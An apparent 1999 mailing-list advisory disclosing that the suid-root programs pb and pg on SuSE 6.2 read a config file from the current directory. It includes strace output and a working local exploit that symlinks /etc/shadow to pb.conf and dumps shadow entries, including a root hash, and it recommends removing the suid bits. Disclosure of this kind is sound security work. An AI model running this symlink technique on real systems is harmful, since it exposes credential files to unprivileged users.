Date: Thu, 16 Sep 1999 19:06:24 -0500
From: Brock Tellier <[email protected]>
To: [email protected]Subject: Two SuSE 6.2 local root exploits
Greetings,
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:
susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root #
---
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits. They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway. These programs are not worth
patching.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com